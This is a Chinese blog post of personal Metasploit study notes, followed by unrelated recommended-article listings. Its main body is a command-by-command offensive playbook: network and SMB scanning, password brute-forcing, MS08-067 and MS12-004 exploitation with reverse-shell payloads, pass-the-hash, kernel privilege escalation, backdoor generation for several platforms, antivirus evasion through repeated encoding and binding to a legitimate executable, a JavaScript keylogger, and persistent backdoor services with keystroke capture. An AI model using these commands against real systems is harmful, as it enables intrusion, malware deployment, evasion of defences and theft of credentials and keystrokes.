meta学习笔记1

最新推荐文章于 2020-04-02 23:18:13 发布
最新推荐文章于 2020-04-02 23:18:13 发布
阅读量234 收藏
点赞数
分类专栏: 自己写的 文章标签: metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/betteroneisme/article/details/100192160
版权

1.启动msfconsole
2.cd /usr/share/metasploit.framework/,然后./msfconsole
3.退出 quit
4.更新 ./msfupdate,若失败重装吧,,,
5.端口扫描
MSF的扫描模块
use auxiliary/scanner/portscan/syn
show options
set INTERFACE eth0
set ports 445
set RHOSTS 192.168.126.0/24
set THREADS 100
run
quit

6.SMB 获取操作系统信息
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.126.128
run

set RHOSTS 192.168.126.1-200
run

7.服务识别 ssh、ftp
use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.168.126.128 192.168.126.131
run

use auxiliary/scanner/ftp/ftp_version

8.密码嗅探
use auxiliary/sniffer/psnuffle
run
在局域网内访问ftp服务,看是否能嗅探到。

9.snmp枚举
use auxiliary/scanner/snmp/snmp_login 登录
use auxiliary/scanner/snmp/snmp_enum 枚举

10.SMB登录检查
IP地址、账号、密码
use auxiliary/scanner/smb/smb_login
set RHOSTS 192.168.1.1/24
run
直接就开始暴力登录了,,,,(难道不需要设置用户和密码字典么?)

11.VNC身份验证
use auxiliary/scanner/vnc/vnc_none_auth
set RHOSTS xxxxx
set THREADS xxx

12.WMAP Web扫描
进入msfconsole后
load wmap
wmap_sites

添加一个url
wmap_sites -a http://www.0day.co

查看添加的url
wmap_sites -l

wmap_targets -h
wmap_targets -t http://210.209.122.31
wmap_targets -l 查看写入成功

wmap_run -t 发现漏洞

wmap_run -e 测试漏洞

wmap_vulns -l 输出扫描出来的结果

第二季

1.远程代码执行
search 08-067
use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.48.169
set payloads windows/meterpreter/reverse_tcp

然后设置载荷
set LHOST 192.16.48.130
可以用nmap扫描对方操作系统的版本
nmap -O xx.xx.xx.xx

set target 17
设置好后,进行攻击,执行exploit
得到shell

2.MIDI文件解析远程代码执行
search 12-004
exploit/windows/browser/ms12_004_midi
set SRVHOST 为本机的IP地址
set URLPATH / ;这样就不会显示随机生成的网页名称,隐藏恶意特征

这个需要别人用IE来访问我们的网站
执行成功后,先不着急弹出shell,执行sessions命令查看会话。

然后执行sessions -i 1的命令,连接session为1的会话
输入shell

3.口令安全
(1)测试MySql
use auxiliary/scanner/mysql/mysql_login
set RHOSTS 127.0.0.1
set USERNAME root
set PASS_FILE /root/1.txt
set THREADS 50
exploit
成功后显示绿色
(2)测试ssh
use auxiliary/ssh/ssh_login
配置同MySql相同
(3)ftp_login

4.Hash值传递渗透
(1)在不知道密码情况下,通过一些方法可以获取密码的hash值,然后使用Hash传递
use exploit/windows/smb/psexec
set smbpass hash值
exploit

5.NDProxy内核提权
先建立会话;
然后搜索,执行search 14-002
exploit/windows/local/ms_ndproxy
这个漏洞只需要设置session参数即可,比如要对会话1进行攻击,set session 1即可。
执行成功后,使用getuid查看当前用户。

6.多种后门生成
(1)windows后门、Linux后门、java后门、php后门、jsp后门、asp后门等等
(2)show payloads 查看载荷
(3)生成载荷,使用msfpayload命令
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.123.31 LPORT=1234 X> /123.exe
生成的123.exe拷贝到目标机中,先不要执行,要在meta中开启监听。
(4)在meta中开启监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
然后设置本地的监听IP和端口,执行等反弹

同理linux下的反弹载荷生成
msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.48.130 LPORT=4321 X>linux

生成java后门
msfpayload java/meterpreter/reverse_tcp LHOST=192.168.x.x … W>123.jar

生成php后门,并对其进行编码
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.48.130 LPORT=4321 R | msfencode -e php/base64 -t -o 123.php

生成安卓后门
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.48.130 LPORT=4321 R >1.apk

7.内网渗透
meterpreter> run get_local_subnets
meterpreter> run autoroute -s 192.168.48.0/24
meterpreter> run autoroute -p

net view 显示域
use incognito;
list_tokens -u(显示令牌吗?)
impersonate_token ADMIN-XXXXX\user1

使用sniffer模块进行嗅探,获取域管理员的密码
use auxiliary/sniffer/psnuffle
xp靶机运行ftp服务,然后登陆看能够获取信息

8.反反病毒(免杀)
编码方式做免杀;
生成一个编码的windows反弹shell
msfpayload windows/shell/reverse_tcp LHOST=192.168.48.130 LPORT=1111 R | msfencode -e x86/shikata_ga_nai -t exe > 123.exe

建议多种编码,提高效果;编码可以组合,也可以单个重复使用。
msfpayload windows/shell/reverse_tcp LHOST=192.168.48.130 LPORT=1111 R | msfencode -e x86/shikata_ga_nai -c 10 -t raw | msfencode -e x86/countdown -c 5 -t exe -o /1231.exe
(使用两种编码,各重复运行了10次和5次)

绑定一个正常文件,与一个ftp.exe捆绑
msfpayload windows/shell/reverse_tcp LHOST=192.168.48.130 LPORT=1111 R | msfencode -t exe -x /root/ftp.exe -o 123123.exe -e x86/shikata_ga_nai -k -c 10

9.玩转XSS
search keylogger
use auxiliary/server/capture/http_javascript_keylogger
set DEMO true
set URIPATH /
set srvport 80
生成一个url,也可以克隆一个页面,比如qq、谷歌

10.后门维持
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST xxx
set LPORT xxx
run ------ 等待靶机回连,建立会话

会话建立后,执行如下命令,上传其他模块,并建立一个服务
run metsvc -A (相当于一个主动马)

再开启一个msfconsole,执行如下命令
use exploit/multi/handler
set payload windows/metsvc_bind_tcp
set LPORT 31377(监听端口,listen port)
set RHOST 192.168.48.130(对方的IP,target ip)
exploit
连接到对方,建立一个会话shell
然后执行keyscan_start操作 ,keyscan_dump

betteroneisme
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
学习笔记1
08-03
学习,又称Meta-Learning,是一种机器学习方法,其核心思想是通过学习如何学习来提升模型在新任务上的适应速度和性能。元学习试图模拟人类的学习过程,即从已有的经验中快速抽取普适性知识,并应用到新的、类似的...
JavaScript基础学习笔记
10-25
JavaScript 基础学习笔记 本资源摘要信息基于黑马视频记录的学习笔记,涵盖了 JavaScript 基础知识点,包括 HTML、CSS、JavaScript、DOM、事件处理等内容。 HTML 和 CSS 基础 * HTML 结构:head、body、title、...
meta学习笔记
blackturtle的博客
03-18 593
meta是HTML语言head中的一个辅助标签,它有2个属性,分别是http-equiv和name。 name属性的参数值是keywords、description、robots、author,http-equiv的参数值是expires、pragma、refresh、set-cookie、window-target、content-type。 1.meta的常见功能 1. 帮助
meta标签笔记(1)
wpysevkk的博客
08-03 187
申明编码 忽略数字自动识别为电话号码 忽略识别邮箱 页面关键词,每个网页应具有描述该网页内容的一组唯一的关键字。 使用人们可能会搜索,并准确描述网页上所提供信息的描述性和代表性关键字及短语。标记内容太短,则搜索引擎可能不会认为这些内容相关。另外标记不应超过 874 个字符。 页面描述,每个网页都应有一个不超过 150 个字符且能准确反映网页内容的描述标签。   浏览器
Metasploit设置VERBOSE参数技巧
大学霸__IT达人
04-02 1032
Metasploit设置VERBOSE参数技巧 当用户使用Metasploit实施渗透测试时,为了输出更多日志信息,可以使用设置VERBOSE参数。在一些模块中,提供了VERBOSE参数,但是默认值为false。当用户设置VERBOSE选项为true时,可以输出更详细的日志信息。其中,设置方法为“set VERBOSE true”。 ...
关于Metasploit-学习笔记-基础命令以及参数
weixin_34190136的博客
09-13 1180
Metasploit官网 原文链接:http://www.freebuf.com/tools/67685.html1、官网内容很多,但是都是一些英文。2、有Windows平台的安装,也有Linux平台的。总之就是基于pc的安装。3、在命令行窗口输入msfconsole可以直接进入Metasploit这个工具的工作环境。4、Msfconsole的系统文件和用户文件位于/usr...
PTH横向移动
网络安全。
02-24 4747
0x01 简介 PTH全称“pass the hash”,即hash传递。PTH通过smb服务进行,走445端口。 0x02 通过PTH横向移动 一、通过cobaltstrike进行PTH 1、在已上线机器中直接dir访问目标系统C盘,提示没权限。 beacon> shell dir \192.168.3.123\c$ 2、此处使用先前已获取的hash对目标administrator用户...
html学习笔记.zip
04-05
介绍了html中代码格式和常用标签 #HTML格式 * `<!DOCTYPE html>`---------*注明文件使用格式* ... `<head>`--------*头部* `<meta charset=UTF-8>`-------*设置字符集,一般都为UTF-8*
javaweb 学习笔记
07-13
### JavaWeb 学习笔记知识点总结 #### 一、JavaWeb 概念及组成 - **定义**: JavaWeb 是一种基于 Java 技术构建 Web 应用的方式,它利用 Java 的强大功能来处理 HTTP 请求并生成动态网页内容。 - **组成部分**: - ...
TensorFlow学习笔记1
08-08
在TensorFlow中,学习和理解各种操作是至关重要的。本篇笔记主要涵盖了...以上就是TensorFlow学习笔记1中涉及的关键概念和使用技巧,掌握这些知识点将有助于深入理解和应用TensorFlow进行深度学习模型的构建和训练。
鹈鹕算法POA-Kmean-Transformer-LSTM组合状态识别分类【含Matlab源码 6749期】.zip
08-02
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:Main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 智能优化算法优化Kmeans-Transformer-lstm分类预测系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO优化Kmeans-Transformer-lstm分类 4.4.2 粒子群算法PSO/蛙跳算法SFLA优化Kmeans-Transformer-lstm分类 4.4.3 灰狼算法GWO/狼群算法WPA优化Kmeans-Transformer-lstm分类 4.4.4 鲸鱼算法WOA/麻雀算法SSA优化Kmeans-Transformer-lstm分类 4.4.5 萤火虫算法FA/差分算法DE优化Kmeans-Transformer-lstm分类 4.4.6 其他优化算法优化Kmeans-Transformer-Lstm分类
三角测量拓扑聚合器TTAO-Kmean-Transformer-BiLSTM负荷预测【含Matlab源码 6686期】.zip
08-02
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:Main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 智能优化算法优化Kmeans-Transformer-Bilstm预测系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO优化Kmeans-Transformer-Bilstm预测 4.4.2 粒子群算法PSO/蛙跳算法SFLA优化Kmeans-Transformer-Bilstm预测 4.4.3 灰狼算法GWO/狼群算法WPA优化Kmeans-Transformer-Bilstm预测 4.4.4 鲸鱼算法WOA/麻雀算法SSA优化Kmeans-Transformer-Bilstm预测 4.4.5 萤火虫算法FA/差分算法DE优化Kmeans-Transformer-Bilstm预测 4.4.6 其他优化算法优化Kmeans-Transformer-Bilstm预测
S9300X-V200R021C00SPC100-MPUE主控版本
08-02
S9300X-V200R021C00SPC100-MPUE主控版本,支持S9300X-4/8/12
【创新未发表】Matlab实现哈里斯鹰优化算法HHO-RF实现风电预测算法研究.rar
08-02
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
【中科院1区】Matlab实现侏儒猫鼬优化算法DMO-RF故障诊断算法研究.rar
最新发布
08-02
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
[毕业设计]JAVA局域网数据包捕获与解析软件开发(源代码+论文).zip
08-02
[毕业设计]JAVA局域网数据包捕获与解析软件开发(源代码+论文)
java-springboot+vue厨艺交流平台的设计与实现源码(项目源码-说明文档)
08-02
java-springboot+vue厨艺交流平台 项目关键技术 开发工具:IDEA 、Eclipse 编程语言: Java 数据库: MySQL5.7+ 后端技术:Springboot 前端技术:Vue、HTML5、css、JavaScript 关键技术:springboot、vue、MYSQL、MAVEN 数据库工具:Navicat、SQLyog
【中科院1区】Matlab实现蜣螂优化算法DBO-RF故障诊断算法研究.rar
08-02
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
【中科院1区】Matlab实现斑点鬣狗优化算法SHO-RF锂电池健康状态估计算法研究.rar
08-02
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
ExtJs入门教程:从零开始的学习笔记
"这是一份基于Word转换的PDF版本的ExtJs学习笔记,内容有所删减,适合初学者。笔记引导读者逐步了解和使用ExtJs,包括从入门到配置工作环境的步骤。" ExtJs是一种流行的JavaScript框架,用于构建富客户端Web应用。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值